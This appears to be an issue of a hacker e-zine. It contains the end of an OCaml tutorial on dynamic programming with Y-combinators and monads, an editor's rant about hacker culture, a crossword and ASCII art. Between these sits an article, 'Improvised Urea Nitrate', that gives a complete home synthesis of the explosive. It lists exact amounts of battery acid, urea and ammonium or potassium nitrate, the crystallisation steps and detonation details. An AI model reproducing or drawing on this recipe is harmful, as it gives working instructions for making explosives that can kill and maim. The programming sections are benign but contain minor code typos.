All these functions are nameless functions (so called lambda-functions). So,
without a name - how are you going to refer to a function for recursion? Well,
actually you won't, because you can't. There is no such thing as recursion in
lambda-calculus. However, let's just see how we can do something similar to
recursion, in a less formal version of lambda-calculus:

let fac' = \ fac n -> if n = 0 then 1 else n * fac fac (n-1) in
fac' fac'

It might take a while until this approach starts to make sense, depending on
your knowledge of mathematics in general and especially of lambda-calculus.
What we do here is to pass, to the function, a version of itself. It then
gets called, again passing it to itself. This is no recursion, since we do not
explicitly refer to the function in itself. The recursive knot however has to
be retied, and this happens in the call "
fac' fac'". If you really want to
understand the idea of this, try programming this version of the factorial
function on your own in a programming language of your choice. It actually
works in almost any language, I did it myself in Java, C, OCaml and BASH a
few years ago. You might have to fiddle around a bit though, to convince the
compiler that you know what you are doing.

So here is one example on how to use this technique in a practical way:
Let's say you have two functions, that are mutually recursive, we'll just call
them even and odd here (thanks to Dr. Jon Harrop for giving this example on the
caml_beginners::[] Mailinglist [6]).

let rec even ?(xs=[]) ?(ys=[]) = function
| [] -> xs, ys
| h::t -> odd ~xs:(h::xs) ~ys t
and odd ?(xs=[]) ?(ys=[]) = function
| [] -> xs, ys
| h::t -> even ~xs ~ys:(h::ys) t;;

These two functions partition a list into those elements at odd places and
those at even places:

# even [0;1;2;3;4;5];;
- : int list * int list = ([4; 2; 0], [5; 3; 1])

Now we untie these definitions:

let rec even odd xs ys = function
| [] -> xs, ys
| h::t -> odd (h::xs) ys t;;

let odd even xs ys = function
| [] -> xs, ys
| h::t -> even xs (h::ys) t;;

Now we could, for example, put both functions into seperate modules, we just
have to retie the knot at some other place:

let rec even' xs = even odd' xs and odd' xs = odd even' xs;;

We'll be able to do this almost automatically lateron, but first we have to take
some further steps and learn some more.



--[ 05 ]--------------------------------------------[ The untied approach ]-----


So let's just apply the newly learned to our algorithm. We will go back to the
first step and use the version without caching, to make it more concise and
readable. Here's the algorithm again:

let rec dtw ?pos s1 s2 dist =
match pos with
None -> dtw ~pos:(Array.length s1-1,Array.length s2-1) s1 s2 dist
| Some (a,b) ->
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw ~pos:(a-1,b-1) s1 s2 dist ;
dtw ~pos:(a ,b-1) s1 s2 dist ;
dtw ~pos:(a-1,b ) s1 s2 dist ]
;;

The optional pos argument can get quite annoying, so we'll rid ourselves of it
first:

let dtw s1 s2 dist =
let rec dtw' (a,b) =
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw (a-1,b-1);
dtw (a ,b-1);
dtw (a-1,b )]
in
dtw' (Array.length s1-1,Array.length s2-1)
;;

This is much better. Now we can easily untie the recursive knot and retie it
again, at the end:

let dtw s1 s2 dist =
(* untied version *)
let dtw' dtw (a,b) =
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw (a-1,b-1);
dtw (a ,b-1);
dtw (a-1,b )]
in
(* retying the knot *)
let rec dtw = dtw' dtw in
dtw (Array.length s1-1,Array.length s2-1)
;;


Now - what have we actually achieved by this? You should be able to tell that
we're still horribly inefficient, because there is no caching. This will be
re-introduced in a later stage, though, when we automatize the step of
retying. For this, we need to have a look at Y-Combinators.



--[ 06 ]------------------------------------[ Digression 2: Y-Combinators ]-----


Let's see if we can extract the process of retying the knot from the function
above. It seems that at the end, we take a function f, apply it to an untied
version of itself, yielding the untied version we just used. Well, sounds like
black magic at first. But read it a few times, and you will see that this is
just the basic pattern for recursion. In a general way it can be programmed
like this:

let y f =
let rec f' arg = f f' arg in
f'
;;

The type of this is:
val y :
(('a -> 'b) ->
'a -> 'b) ->
'a -> 'b


This is one possibility for for the so called Y-Combinator. An alternative
would be:

(* careful, this one wont work as expected *)
let rec y f = f (y f);;

At least it would be in pure lambda calculus. However OCaml is not a lazy
language, and will hence try to evaluate the full recursion, before calculating
anything else. We have to trick it into doing normal-order (or lazy) evaluation
here. We do that using eta-expansion [9], i.e. adding an argument to the
functions on both sides of the equation:

let rec y f x = f (y f) x;;

In pure lambda calculus we would have the following
(taken from Wikipedia again [10])

Y = \f . (\x . f(x x)) (\x . f (x x))

Applying this to a function gives us:

Y g = (\f . (\x . f (x x)) (\x . f (x x))) g
=> Y g = (\x . g (x x)) (\x . g (x x))
=> Y g = (\y . g (y y)) (\x . g (x x))
=> Y g = g ((\x . g (x x)) (\x . g (x x)))
=> Y g = g (Y g)

So using this would give us an infinite sequence akin to:

g ( g ( g ( g ( g ( g ( g ( ... ( Y g) ... )))))))

This is the sequence the computer attempted to compute when we gave it the
simple form of the Y-Combinator. If you look at this from a different
perspective, you will notice that this is very much like a fixed-point iteration
on the function g. So the Y-Combinator is one of the basic forms of fixed-point
combinators. For any function you pass to it in pure lambda calculus, it will
yield the fixed point of that function. That was quite a shock to Church and
other researchers, when they studied lambda calculus, because there are some
functions that simply should not have fixed points, like the "
not" function or
the increment function. In lambda calculus they do however. This is due to
non-terminating functions having a value as well. Well, I better not get into
more depth here, because we only need the Y-Combinator for our recursive knots
and not to find fixed points.



--[ 07 ]-------------------------------------[ Re-introducing the caching ]-----


So this is where we stoped:

let dtw s1 s2 dist =
(* untied version *)
let dtw' dtw (a,b) =
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw (a-1,b-1);
dtw (a ,b-1);
dtw (a-1,b )]
in
(* retying the knot *)
let rec dtw = dtw' dtw in
dtw (Array.length s1-1,Array.length s2-1)
;;

Now we add the Y-Combinator to this and we get the following:

let y f =
let rec f' arg = f f' arg in
f'
;;

let dtw s1 s2 dist =
let dtw' dtw (a,b) =
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw (a-1,b-1);
dtw (a ,b-1);
dtw (a-1,b )]
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;

Now what did we do this for? Quite simple: We want to re-introduce the caching,
but we don't do this in our function directly. We rather produce a version of
the y-combinator, which does the caching for us:

let y f =
let cache =Hashtbl.create 10 in
let rec f' arg =
try
let v = Hashtbl.find cache arg in
v
with Not_found ->
let v = f f' arg in
Hashtbl.add cache arg v;
v
in
f'
;;

let dtw s1 s2 dist =
let dtw' dtw (a,b) =
if a <0 || b < 0 then
infinity
else if a = 0 && b = 0 then
dist s1.(0) s2.(0)
else
dist s1.(a) s2.(b) +.
List.fold_left min infinity
[dtw (a-1,b-1);
dtw (a ,b-1);
dtw (a-1,b )]
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;

Now, whenever a value is to be calculated, the combinator automatically checks
if it has been calculated before. Also, the combinator produces the cached
version of the function, at each call to itself. So whenever we pass different
arguments to our final dtw function, it will produce a unique cached and
recursive version, which is then applied. Thus we do not even have to worry,
about cleaning the cache or anything.



--[ 08 ]----------------------------[ Getting rid of the imperative cache ]-----


The next step is rather straight-forward. We have to exchange the imperative
cache using a Hashtable with a functional one using a map. Unfortunately,
the Map interface in OCaml is not what it should be (Please, INRIA. Give us a
better standard library containing all the stuff we need), so we have to code
a module which will then be used as a argument to a functor etc. etc.

Straight-forward code:

module OrderedPair =
struct
type t = int * int;;
let compare (a1,b1) (a2,b2) =
let v1 = a1-a2 in
if v1 = 0 then b1-b2 else v1
;;
end

module PairMap = Map.Make(OrderedTupel);;

I will assume this has been done, wherever I use a map using pairs as keys. If
you don't understand this part, don't worry too much, it is not at all important
for the other steps. Ok, let's see how our new combinator looks now:

let y f arg =
let rec f' (cache,arg) =
try
let v = PairMap.find arg cache in
(cache,v)
with Not_found ->
let (cache',v) = f f' (cache,arg) in
(PairMap.add arg v cache',v)
in
let _,v = f' (PairMap.empty,arg) in
v
;;

This is basicaly the same as we did before, except that our DTW function has
gotten one extra argument. This is to take care that the cache is passed on
through all recursive calls. This is also reflected in the changed type:

val y :
(('a PairMap.t * PairMap.key -> 'a PairMap.t * 'a) ->
'a PairMap.t * PairMap.key -> 'a PairMap.t * 'a) ->
PairMap.key -> 'a

The uncurrying has been done, to make the input and output of the function more
similar, so it's easier to follow what is happening here. A rather similar and
uncurried version can be found in [11].

The next part is to include the threading of the cache in our dtw algorithm:

let dtw s1 s2 dist =
let dtw' dtw (cache,(a,b)) =
Printf.printf "
Calling DTW on %d %d\n" a b;
if a <0 || b < 0 then
cache,infinity
else if a = 0 && b = 0 then
cache,dist s1.(0) s2.(0)
else
let cache',p1 = dtw (cache,(a-1,b-1)) in
let cache'',p2 = dtw (cache',(a ,b-1)) in
let cache''',p3 = dtw (cache'',(a-1,b )) in
let v = dist s1.(a) s2.(b) +.
List.fold_left min infinity
[p1; p2; p3]
in
cache''',v
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;

So now we have occurences of the cache floating around everywhere in our main
algorithm. It would be nice if there was a way to get rid of those. Well, we
are not the first ones to be facing such a problem. What we are going to use
this time are monads, or more particular a kind of state monad.



--[ 09 ]-------------------------------------------[ Digression 3: Monads ]-----


Ok, here comes the last technique you need to know. You've probably heard about
this before, because it is often mentioned in the context of functional
programming. What I am talking about are Monads. Monads are a rather powerful
device, allowing us to cope with the loss of side effects in a purely
functional environment. Some concepts that can be realized using monads are,
for example: I/O, list comprehensions, stateful programming, exceptions.
One sentence that occurs a lot when reading up on this topic is that some kinds
of monads are so simple, that "
you could have invented them yourself, and
probably have". Isn't it good to know how smart you *really* are?

So what exactly are monads? Informally speaking, monads are some kind of wrapped
up values. Whenever you have a monad, it will somehow contain one or more
values, but you cannot easily access those values. Let's look at a simple
example, one that I personally find really easy to understand and one that has
not been covered that much: Functions from Ints to something else ('a).
That's already a monad. The values you have, in those functions, are wrapped:
You need to know the place if you want to access a specific value. However, it
would be a nuisance if you always had to figure out the place (or some other
sort of key) first. You can also provide rules on how to combine the values,
without knowing the place. Which places are combined then depends a lot on the
implementation of the monadic operators. Oh, and of course, there is a simple
way to construct monads: The return function, which every monad must supply.
The return function constructs a monad in the "
most simple way", whatever that
means. For our function monad the return looks quite simple:

let return a =
fun ( _ : int) -> a;;

See, we wrapped up the value a at all places. Now we have another operator to
give rules on how to handle values inside. It's usually called >>= and it has
the type:

val (>>=) :
'a monad -> ('a -> 'b monad) -> 'b monad

So it takes a monad and a rule, and constructs a new monad from that. One simple
example on how to use it:

m >>= fun x ->
return x+2;;

This will construct a function monad that contains the former value increased by
two at all places. Or we can do a heavyside-function on all our values:

m >>= fun x ->
if x > 10 then return 1 else return 0

And quite a lot more. The way the >>= is implemented for this is:

let (>>=) m fm =
fun (v : int) ->
(fm (m v)) v;;

So now is a time to get a bit more formal. For our definitions to make sense,
we would like them to follow a few simple axioms [12]:


1. "
return" must preserve all information about its argument.

(return a) >>= f <-> f a
m >>= return <-> m

2. Binding two functions in succession is the same as binding one function that
can be determined from them.

(m >>= f) >>= g <-> m >>= (\x -> (f x >>= g))


(Here the symbol "
<->" is used to indicate that these two expressions are
equivalent)

We'll see if we got those for our function monad:

1.1:
(return a) >>= f
<=> fun v -> f ((return a) v) v | Definition of >>=
<=> fun v -> f ((fun _ -> a) v) v | Definition of return
<=> fun v -> f a v | Beta-reduction for "
(fun _ -> a) v"
<=> f a | Eta-contraction

1.2:
m >>= return
<=> fun v -> return (m v) v | Definition of >>=
<=> fun v -> (fun _ -> (m v)) v | Definition of return
<=> fun v -> m v | Beta-reduction
<=> m | Eta-contraction

2:
(m >>= f) >>= g
<=> fun v -> (g ((m >>= f) v)) v | Definition of >>=
<=> fun v -> |
(g ((fun v' -> (f (m v')) v') v)) v | Definition of >>=
<=> fun v ->

  
((fun x -> f x >>= g) (m v)) v | Beta-expansion
<=> m >>= (fun x -> f x >>= g) | Definition of >>=

[ q.e.d. ]


Now, instead of the >>= and the lambda expressions you can often use the
do-notation:

m >>= fun x ->
return x+2;;

becomes

do
x <- m
return x+2

For the exchange between those two notations see a nice post on the
Jane-street-Blog [13].

As mentioned before, you can also wrap up values with error codes, seperating
real calculations from those that have produced errors [14]. Or do list
comprehensions using those operators:

let return a =
[a];;

let (>>=) m fm =
List.concat (List.map f xs);;

For more information I recommend the chapters on monads from the Haskell School
of Expression [15].



--[ 10 ]-------------------------------------------------[ Final Solution ]-----


Ok, here is our code so far:

let y f arg =
let rec f' (cache,arg) =
try
let v = PairMap.find arg cache in
(cache,v)
with Not_found ->
let (cache',v) = f f' (cache,arg) in
(PairMap.add arg v cache',v)
in
let _,v = f' (PairMap.empty,arg) in
v
;;


let dtw s1 s2 dist =
let dtw' dtw (cache,(a,b)) =
Printf.printf "Calling DTW on %d %d\n" a b;
if a <0 || b < 0 then
cache,infinity
else if a = 0 && b = 0 then
cache,dist s1.(0) s2.(0)
else
let cache',p1 = dtw (cache,(a-1,b-1)) in
let cache'',p2 = dtw (cache',(a ,b-1)) in
let cache''',p3 = dtw (cache'',(a-1,b )) in
let v = dist s1.(a) s2.(b) +.
List.fold_left min infinity
[p1; p2; p3]
in
cache''',v
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;

We wanted to get a monad to do the threading of the cache through the recursions
for us. Thus, instead of producing values, we produce functions that depend on a
cache to produce values. Things like this are usually called state monads.
Because the only type of state we have is our cache, I will call this a cache
monad or cmonad here. Let's see how our operators look:

let return a = fun c -> c,a;;

Ok, that was easy, we just pass on the cache and always return the same value
a here.

let (>>=) m1 fm2 =
fun c0 ->
let (c1,v1) = m1 c0 in
let m2 = fm2 v1 in
m2 c1
;;

Hmm, not to bad either. We just put the cache down our first function, see what
comes back and pass that on to the next. Now all we have to do is to reverse the
order of the arguments in our Y-´Combinator, passing the position first and
then the cache, and then use the monad in our main function:


let y f arg =
let rec f' arg cache =
try
let v = PairMap.find arg cache in
let a,b = arg in
(cache,v)
with Not_found ->
let (cache',v) = f f' arg cache in
(PairMap.add arg v cache',v)
in
let _,v = f' arg PairMap.empty in
v
;;

let dtw s1 s2 dist =
let dtw' dtw (a,b) =
if a <0 || b < 0 then
return infinity
else if a = 0 && b = 0 then
return (dist s1.(0) s2.(0))
else
dtw (a-1,b-1) >>= fun p1 ->
dtw (a ,b-1) >>= fun p2 ->
dtw (a-1,b ) >>= fun p3 ->
let v = dist s1.(a) s2.(b) +.
List.fold_left min infinity
[p1; p2; p3]
in
return v
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;


Looks a bit more complicated than the imperative version, doesn't it? Well,
yeah. If you look at the Y-Combinator, it does. But you can wrap those
combinators in a library and reuse them. Then all you have to do is to write
down your principle of optimality and it will produce an dynamic programming
algorithm for you. Neat, huh?



--[ 11 ]---------------------------[ Conclusions and Further perspectives ]-----


Ok, so that is all. I hope you enjoyed learning a few more functional
programming techniques. If you really want to get a hang of those, I suggest you
do a few calculations or proofs on your own. Figuring out what actually goes on
in a program is one of the best things you can do to increase your programming
skill. Hum, let me get this short example from Hudak's book:

instance Monad Label where
return a
= Label (\ s -> (s,a))
Label lt0 >>= flt1
= Label $ \ s0 ->
let (s1,a1) = lt0 s0
Label lt1 = flt1 a1
in lt1 s1

mlabel :: Tree a -> Tree Integer
mlabel t = let Label lt = mlab t
in snd (lt 0)

mlab :: Tree a -> Label (Tree Integer)
mlab (Leaf a)
= do n <- getlabel
return (Leaf n)
mlab (Branch t1 t2)
= do t1' <- mlab t1
t2' <- mlab t2
return (Branch t1' t2')

getLabel :: Label Integer
getLabel = Label (\ n -> (n+1,n))

mtest = let t = Branch (Leaf 'a') (Leaf 'b')
in mlabel t

or alternatively:

mtest = let t = Branch (Leaf 'a') (Leaf 'b')
in mlabel (Branch t t)

If you do those calculations you will probably be left with several pages of
writing you'll better hide under your bed, because people visiting you would
think that you have gone completely nuts. On the other hand, it will also give
you a deeper understanding on how things work beneath the hood of a functional
program. Oh, yeah, the final code for the example I used looks like this:

module OrderedPair =
struct
type t = int * int;;
let compare (a1,b1) (a2,b2) =
let v1 = a1-a2 in
if v1 = 0 then b1-b2 else v1
;;
end

module PairMap = Map.Make(OrderedPair);;

type 'a cmonad = 'a PairMap.t -> 'a PairMap.t * 'a;;

let return a = fun c -> c,a;;

let (>>=) m1 fm2 =
fun c0 ->
let (c1,v1) = m1 c0 in
let m2 = fm2 v1 in
m2 c1
;;

let y f arg =
let rec f' arg cache =
try
let v = PairMap.find arg cache in
let a,b = arg in
Printf.printf "Retrieving cached value for %d %d\n" a b;
(cache,v)
with Not_found ->
let (cache',v) = f f' arg cache in
(PairMap.add arg v cache',v)
in
let _,v = f' arg PairMap.empty in
v
;;

let dtw s1 s2 dist =
let dtw' dtw (a,b) =
Printf.printf "Calling DTW on %d %d\n" a b;
if a <0 || b < 0 then
return infinity
else if a = 0 && b = 0 then
return (dist s1.(0) s2.(0))
else
dtw (a-1,b-1) >>= fun p1 ->
dtw (a ,b-1) >>= fun p2 ->
dtw (a-1,b ) >>= fun p3 ->
let v = dist s1.(a) s2.(b) +.
List.fold_left min infinity
[p1; p2; p3]
in
return v
in
y dtw' (Array.length s1-1,Array.length s2-1)
;;

I added some printfs here, so you can see how it builds up the table for the
DTW. All the techniques described here have been taken further in [11], where
they use Multi-Stage-Programming (a special type of Meta-Programming) in
MetaOCaml to build a library that can solve dynamic programming methods
blazingly fast.

I also found something called "Algebraic Dynamic Programming" [16,17], but I
haven't managed to do more than to scan over those papers so far. Maybe I'll
tell you something about this the next time.



-------------------------------------------------------------[ References ]-----

[1] http://caml.inria.fr/
[2] R. Bellman. Dynamic Programming. Princeton University Press, 1957.
[3] http://en.wikipedia.org/wiki/Bellman_equation
[4] http://en.wikipedia.org/wiki/Dynamic_time_warping
[5] M. Müller. Information Retrieval for Music and Motion. Springer 2007.
[6] http://tech.groups.yahoo.com/group/ocaml_beginners/message/9075
[7] Achim Jung. A short Introduction to the Lambda Calculus.
Available at: http://www.cs.bham.ac.uk/~axj/pub/papers/lambda-calculus.pdf
[8] David C. Keenan. To Dissect a Mockingbird: A Graphical Notation for the
Lambda Calculus with Animated Reduction.
Available at: http://users.bigpond.net.au/d.keenan/Lambda/
[9] O. Danvy, K. Malmkjær, J. Palsberg. Eta-expansion does The Trick.
ACM Transactions on Programming Languages and Systems (TOPLAS) 18.6.
ACM, 1996.
[10] http://en.wikipedia.org/wiki/Fixed_point_combinator
[11] K. Swadi, W. Taha, O. Kiselyov. Staging dynamic programming algorithms.
April 2005. Unpublished manuscript.
available from http://www.cs.rice.edu/~taha/publications.html.
[12] http://en.wikipedia.org/wiki/Monads_in_functional_programming
[13] http://ocaml.janestcapital.com/?q=node/23
[14] D. Teller, A. Spiwack, T. Varoquaux. Catch me if you can: Towards
type-safe, hierarchical, lightweight, polymorphic and efficient error
management in OCaml. 2008, unpublished manuscript.
available at: http://lambda-the-ultimate.org/node/2892
[15] P. Hudak. The Haskell School of Expression.
Cambridge University Press, 2000.
[16] R. Giegerich, C. Meier. Algebraic Dynamic Programming.
Springer LNCS. Springer 2002
[17] R. Giegerich and P. Steffen. Implementing Algebraic Dynamic Programming
in the Functional and the Imperative Programming Paradigm.
Springer LNCS. Springer 2002.

--------------------------------------------------------------------[ EOF ]-----


[==============================================================================]
[--------------------------[ Improvised Urea Nitrate ]-------------------------]
[==============================================================================]


_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/´_`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<##### author: Mr.X
################ date: 2008/07/15
*############*
"T######T"



1. Introduction
---------------

In this file the properties and preparation of urea nitrate will be
discussed. Doing some experiments, I found a convenient way to
make it from readily available chemicals. It will be presented in this
document.

2. Chemical, physical and explosive properties of urea nitrate
--------------------------------------------------------------


O
||
C
/ \
H2N NH2.HNO3

Urea nitrate, as one can tell from its name, is a salt of nitric acid
and urea. It is white crystalline substance with acidic properties.
Solubility in cold water is low, in hot water it dissolves readily.
Under action of concentrated sulfuric acid or other dehydrating agents
it yields nitrourea, which is a more powerful explosive than urea nitrate.
Urea nitrate requires a blasting cap to detonate. From my experience I can tell
that a few grams of AP is enough. Lead block test is 260-270 cm^3, velocity of
detonation is 3400 m/s (at density 0.85 g/cm^3)/4700 (at density 1.2 g/cm^3).
Crystal density is 1.59 g/cm^3.

3. How to make one in your basement
-----------------------------------

Well, this is quite easy.

Needed chemicals:

1. Car battery acid (approx. 35% H2SO4, one should look for it
in gas stations and hardware stores).
2. Urea (I bought it as a fertilizer).
3. Ammonium nitrate (It's a fertilizer too, though I heard it is
hard to get in some countries).

Procedure:

1. In a glass jar, add 60 grams of urea to 150 ml of water. Make sure
urea is fully dissolved in water and there is no layer of the material
on bottom of jar. Stir the stuff, etc.

2. In another jar, add 107 ml battery acid, 50 ml water and 80 g of
ammonium nitrate. As in previous the step, make sure that the AN is fully
dissolved.

3. Mix both liquids in one jar. Lots of fine urea nitrate crystals
will appear in seconds. (Very fun to watch.)

4. Filter the crystals off. Start to dry them. Don't discard the liquid
that you have after filtration, it will still be useful.

5. Put the liquid in some frosty place for a few hours. It shouldn't be
too cold though, because that would make the solution freeze. -10 C
temperature was fine when I tried it.

6. Some quantity of urea nitrate crystals will be obtained from our
liquid. Filter it off immediately after you take the mixture from your
freezer/heap of snow and dry. We don't want UN to dissolve again.

To make UN more pure, one can recrystalize it from acetone.

Reactions that occur during this synthesis:

H2SO4 + 2NH4NO3 <--> 2HNO3 + (NH4)2SO4 (Step 2)

O O
|| ||
C + HNO3 --> C
/ \ / \
H2N NH2 H2N NH2.HNO3

(Step 3)

4. If you can't get ammonium nitrate...
---------------------------------------

Since I am lucky enough to live in a country that does not
require a license to buy AN, I was making urea nitrate using it.
However, ammonium nitrate is quite unavailable to common people in
many places. Luckily, it can be replaced by any inorganic nitrate with
good water solubility. Basically, all you need is to have 1 mol of
nitrate ions from AN. KNO3 is less soluble in water, but more
easily available in many places than NH4NO3. To make urea nitrate
using it, use 101 g of this substance instead of ammonium nitrate.
In this case, the following reaction takes place during second step
of synthesis:

H2SO4 + 2KNO3 <--> 2HNO3 + K2SO4 .

Potassium nitrate (KNO3) is also fertilizer and one should look
for it in stores that have stuff for gardening.

I don't think I need to rewrite the recipe. Just substitute
80 g of ammonium nitrate with 101 g of potassium nitrate and add
more water to ensure it dissolves.

5. Outro
--------

Some recipes I have seen involve adding NH4NO3/KNO3 and urea to
hydrochloric acid or diluted H2SO4 and mixing until you get urea
nitrate. I found that this way isn't as convenient as preparing
solutions in different jars and mixing them.

Have fun.

6. References
-------------

1. T. Urbanski - Chemistry And Technology Of Explosives. Vol 3, page 469.
2. Fedoroff & Co. - Encyclopedia Of Explosives and Related Materials.
Vol. X, page U 102.
3. Organic Syntheses, Coll. Vol. 1, p. 417 (1941); Vol. 5, p. 85 (1925).
http://www.orgsyn.org/orgsyn/pdfs/CV1P0417.pdf

<EOF>


[==============================================================================]
[------------------------------[ cat /dev/random ]-----------------------------]
[==============================================================================]



..,,,,..
.,;<CCCCCCCCCCCCC>;,.
CCCCCCCCCCCCCCCCCCC>>>>''
'''',,`<CCCCCCCC"',;CCCCCCCC>;.
d$$$$$$$c,<C>>',CCCCCCCCCCCCCCCC>,
$$$$$$$$$P",c$$c,`C>',,`"CCCCCCCCCC>,
$$$$$$$P",d$$$$$$c =`CCC>`<CCCCCCCCCC>/\.
$$$$$P",d$$$$$$$$$c`$c,`CC,<CCCCCCCCCC C',
$$$" z$$$Ez "$$$$c`$$bc`<,)CCCCCCCCC (->
$$',$$$$$P\<--\ "$$$c`$$$P `-)CCC'CCCC;
?FJ$$$$$F ><.` `?$$$,""? "" ,CCCCCC>,
"\"$$$$ >.\- "$$$bc,,,cc$$bc,`<CCCCC>,
"$$$ .<< `?$$$$$$$$$$$$$c`<CCCCC;
`$$ ``'> ???????""?$$c`< ;,`'>,.
$b`'( .: d$$F `"?b, `><C,
`$L`' :',$P "?$c,<CC
`$c ; <;;, :: $$ "?$c,>
$$h < !!!! ::: $F "?"
`$$$h,`<!!!,`>;': $'
`?$d$$.`!!! `!> $
"?$$$,`<!!,`!> ?
"$$$, `<!,`! ! The rattler's private
`?$; `!!;`>` thoughts on the world,
"$b !!!!! the scene,
?b !!!!> and your mom.
"$ <!!!>
"$c``!!;,
`?L `'/
"?L,`!.
`<>,.
`'!!>;,,,----
`'---,,,_



_______ _____ ___ _____ _ _ ________________________________
___| _ \_ _|__ |_ _| _ \_ |_ _| || | Just a personal rambling I had
/ -_) _/| |/ _| | | | / || || | | __ | to get rid of. Feel invited to
\___|_| |___\__| |_| |_|_\\_,_||_| |_||_| skip it if you dont care.
==============================================================================
The developers of the computer were scientists and engineers, much too
academic to foresee the cancer that would grow from the spawn of their little
device. It was made to model FSM's, not cartoon fishes. The internet was a
similar idea: It was a network for universities, to exchange information. Of
course, noone considered something as absurd as spam when they designed email.
On the other hand, it is unavoidable that certain people will push technology
to the outer limits of absurdity. I have no problem with that. I just have a
problem with people doing any of it to get fame out of it, or even money.
People who have no intellectual spirit, no curiosity, people who only hack for
the purpose of public masturbation.

And there's more and more people, blind in their desperation to be a computer
hacker. This is mainly due to the theatrical image of hackers in modern media.
Yea, that's right. The typical hollywood hacker is the handsome, unshaved guy
with the shady past. He posesses knowledge of some dark art to magically make
all technical and computer devices bend to his very will. But he's still the
renegade outlaw protagonist, and in the end, he saves the world and rescues
the princess.

https://www.awarenetwork.org/etc/hacker.htm

And now we have IRC servers full of milw0rm* kids, just like YOU, dear reader,
who want to be the world's coolest Stan Jobson. People think they're oldskool
just because they publish their petty mysql dumps in plaintext. Noone is into
freedom of information anymore, the people who call themselves hackers now
want to *hide* information. Noone discloses anything anymore, it's a big gay
fuckfest of mutual "owning". Not that it wouldn't require any effort. There's
a lot of hard work involved to get your part of the wank. But understand: I am
not talking about that. I am talking about motivation, and the motivation for
all of this is hollow. Purpose has replaced passion. And without passion,
there is no beauty in what you do.

,,,xxxx\
``''==xx#################xxxxx===---xxx##########\
`''################################\
#### ####P'
#### ####
#### ####
####`'=.. #### ,#####
,#### ###,, ####,,==#####""'
,###`'== '####\ ####
,,##` ""### #### ####
#### #### ####
####### ####
#### ####
#### ####
#### #### #
,####' #### ##
,####' #################
,x## ##############


I stand against this development. The .aware zine will always contain actual
information; technical and amateur-level scientific papers. This is what
hacking should be about - and I don't care about the area of science covered.
Chemistry and biology are as good as math or electronics, which are in turn as
good as any topic of information science or computer security.

-rattle

PS: Thanks to Phrack Staff for thinking the same damn thing in a more polite
manner, see Phrack CFP for issue #66.

*) no offense to milw0rm. @ str0ke: kudos to your good work.

[==============================================================================]


Now on to happier topics. Look at this mindgobbling cube 3d image!

____
/\ \
/ \___\
_\ / __/_
/\ \/_/\ \
/ \___\ \___\
_\ / / / __/_
/\ \/___/\/_/\ \
/ \___\ / \___\
_\ / __/_ _\ / __/_
/\ \/_/\ \/\ \/_/\ \
/ \___\ \___\ \___\ \___\
\ / / / / / / / /
\/___/\/___/\/___/\/___/


[==============================================================================]


.AWARE Xw0RDZ FOR YOU!! If you know the solution, you
know how to reward yourself.
But remember: Arrows indicate
direction of spelling. This means, some words have to be spelt
backwards. Some have to be spelt upside down.

_______________________________________________________________________
| | bewitch | | | |###########|
| | the prime | WANNA | THE | Cameroon |###########|
| | after | CYBER | SOLUTION | TLD |###########|
| | 233811140 | | | |###########|
|___________|_____v_____|_____v_____|_____v_____|_____v_____|###########|
| | v | v | v | v | |
| | | | | | Text |
| | | | | << segment |
| | | | | | |
|___________|___________|___________|___________|___________|___________|
| | | | | | |
| | | | | |Quotient of|
| | | | | << codomain |
| | | | | | by image |
|_____^_____|___________|___________|___________|___________|___________|
| ^ | | | | | |
| | |l=[045,13] | | | |
| Ayanami | |l.sort ( | | )
| | |l==[13,37] | | | |
|___________|___________|___________|___________|___________|___________|
| | | | | | |
| Mrs. | | | | 2600B | |
| Lovelace >> | | << file | |
| | | | | infector | |
|___________|___________|___________|___________|___________|___________|
| | | | | | |
| zone-h | | | | | |
| are? >> | | | | |
| | | | | | |
|___________|___________|___________|___________|___________|___________|
| | | | | | |
| | | | | Father | |
| | | | >> of | |
| | | | | Emacs | |
|___________|___________|___________|___________|___________|_____^_____|
| | | | | | ^ |
| Michael | | | | | Born in |
| "burning >> | | | | 1987 (not |
| laptop"- | | | | | the year) |
|___________//__________|___________|___________|___________|___________|
| // | | | | |
| _ SEND | | | | | |
| rattle | FET >> | | | |
| 12yr0.avi | | | | | |
|___________|___________|___________|___________|___________|___________|


Be the first to beat the complete crossword challenge and get a honorable
mention in .aware eZine delta! (except for you, zshzn.)

PS: thx to zshzn for his help!


[==============================================================================]



print(lambda r:(lambda I:'\n'.join([''.join([(lambda S,R:chr(32+(S<R<<4)*(S+R>
2*r*(x+y))))(x**2+y**2,r**2) for x in I]) for y in I]))(range(-4*r,4*r+1)))(6)



[==============================================================================]



_..gggggppppp.._
_.go2DD54CA5F04E6EE60Aop._
.g4CBD616BE88DF93F761A90FA0393p.
.g9A1C6A235A1DC2208D42AB86940C9A954Ep.
.oDA77550E3A55D3F079F0B6E6959916DE95CAE3o.
.o52950F71920F908B563D6A79DDD4A375DA5978CE25o.
o7EC76BC428D48FC156D98C79077EFCE5DA156F4552C40Bo
o4A55E5C22696814ECA2332797A7B5B088A9DD82D09D1A0A3o
oEE3BBD799DEDE79EAF3B2BFC71CEA704AD412B8FD612A3B29Bo
o9D7675F188662EEAD5FA677A6C2F934DE3194460F0E51B57857Co
o317227593982925589EF8B5D496D3C0039B7D9200DD44DB26AA8CBo
:F0D819CD076F1229B151A00CC514BB9349452681389C6A710C78E791;
